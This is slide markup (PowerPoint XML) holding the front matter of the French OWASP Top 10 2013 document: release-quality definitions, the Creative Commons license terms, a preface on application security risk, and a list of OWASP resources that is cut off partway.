              <a:t>Le contenu de « Qualité Alpha » est un document de travail dont le contenu est approximatif et en développement jusqu'au niveau de publication supérieur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>BETA: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Le contenu de « Qualité Beta » correspond au niveau de publication suivant. Le contenu reste en développement jusqu'à la prochaine publication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>RELEASE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Le contenu de « Qualité Release» est le plus haut niveau de qualité du cycle de publication d’un ouvrage, et correspond au produit final.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="228600"/>
            <a:ext cx="1387367" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>VOUS ÊTES LIBRES:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4683760" y="762000"/>
            <a:ext cx="2021840" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>de partager </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>- copier, distribuer et transmettre ce travail</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4683760" y="1254760"/>
            <a:ext cx="2021840" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>de modifier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>- d'adapter ce travail</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="ZoneTexte 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4214053" y="1828800"/>
            <a:ext cx="2429383" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>SOUS LES CONDITIONS SUIVANTES:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="ZoneTexte 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4683760" y="2275840"/>
            <a:ext cx="2021840" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>Attribution - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Vous devez attribuer ce travail de la façon spécifiée par les auteurs ou concédants (mais sans jamais suggérer qu'ils vous soutiennent ou supportent l'usage que vous en faîtes).</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="ZoneTexte 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4683760" y="3220720"/>
            <a:ext cx="2021840" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>Partage à l'identique - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Si vous altérez, transformez ou réutilisez ce travail, vous ne pouvez  distribuer le travail résultant que sous la même licence, sous une license similaire ou sous une license compatible.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3276559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O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A propos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>l’OWASP</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029434670"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8001000"/>
          <a:ext cx="6858000" cy="1154591"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="354169">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Copyright et Licence</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="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7888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Copyright © 2003 – 2013 The OWASP Foundation</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Ce document est publié sous licence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Creative</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Commons Attribution </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ShareAlike</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 3.0. A chaque réutilisation ou distribution, vous devez en faire clairement apparaître les conditions contractuelles</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1371600"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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="8517890"/>
            <a:ext cx="1046163" cy="37465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4003215416"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1144986"/>
          <a:ext cx="3352800" cy="6779813"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="380488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Préface</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" kern="120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639932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fr-FR" sz="900" baseline="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fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Les logiciels non sécurisés sapent nos infrastructures critiques telles la finance, la santé, la défense, l’énergie et autres. Notre infrastructure numérique devenant de plus en plus complexe et interconnectée, la difficulté de parvenir à une sécurité des applications augmente de façon exponentielle. Nous ne pouvons plus nous permettre de tolérer les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>problèmes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> les plus simples comme ceux présentés dans ce Top 10 OWASP.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Le but de ce projet est de sensibiliser à la sécurité des applications en identifiant certain des risques les plus critiques rencontrés par les entreprise. Ce top 10 est référencé par de nombreuses normes, livres, outils et organisations telles MITRE, PCI DSS, DISA, FTC et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>bien d’autres</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Cette version du Top 10 OWASP marque la onzième année de ce projet de sensibilisation à l’importance des risques de sécurité des applications. La première publication du Top 10 date de 2003, avec des mises à jour mineures en 2004 et 2007. La version 2010 a été réorganisée afin de prioriser par risque, et non juste par prédominance. Cette édition 2013 suit la même approche.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Nous vous encourageons à utiliser ce Top 10 pour que votre entreprise entame une démarche pour la sécurité des applications. Les développeurs peuvent apprendre des erreurs des autres. Les dirigeants devraient commencer à réfléchir sur la façon de gérer le risque que les logiciels créent dans leurs entreprises.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Sur le long terme, nous vous encourageons à créer un programme de sécurité des applications compatible avec la culture et la technologie d’entreprise. Ces programmes sont de toutes formes et tailles, et vous devez éviter de tenter de tout faire en un modèle de processus. Au lieu de cela, tirez parti des points forts de votre entreprise et mesurez ce qui fonctionne pour vous.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Nous espérons que ce Top 10 est utile à vos efforts. N'hésitez pas à contacter l'OWASP pour vos questions, commentaires et idées, soit publiquement à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>owasp-topten@lists.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> ou à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>dave.wichers@owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> en privé.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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415131583"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="1143000"/>
          <a:ext cx="3429000" cy="6781800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="382079">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>L’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0">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639972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fr-FR" sz="900" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Open Web Application Security Project (OWASP) est</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> une communauté publique permettant à des organismes de développer, acheter et maintenir des applications fiables. A l’OWASP, vous trouverez en accès libre et gratuit…</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Des normes et des outils</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de sécurité des applications</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Des livres complets sur les tests de sécurité des applications, le développement de code sécurisé et l’audit de code</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Des normes de contrôles de sécurité et</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> des librairies</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Des Chapitres locaux dans le monde entier</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>De</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> la recherche de pointe</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Des conférences </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>à travers le monde</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Des</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> listes de diffusion</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
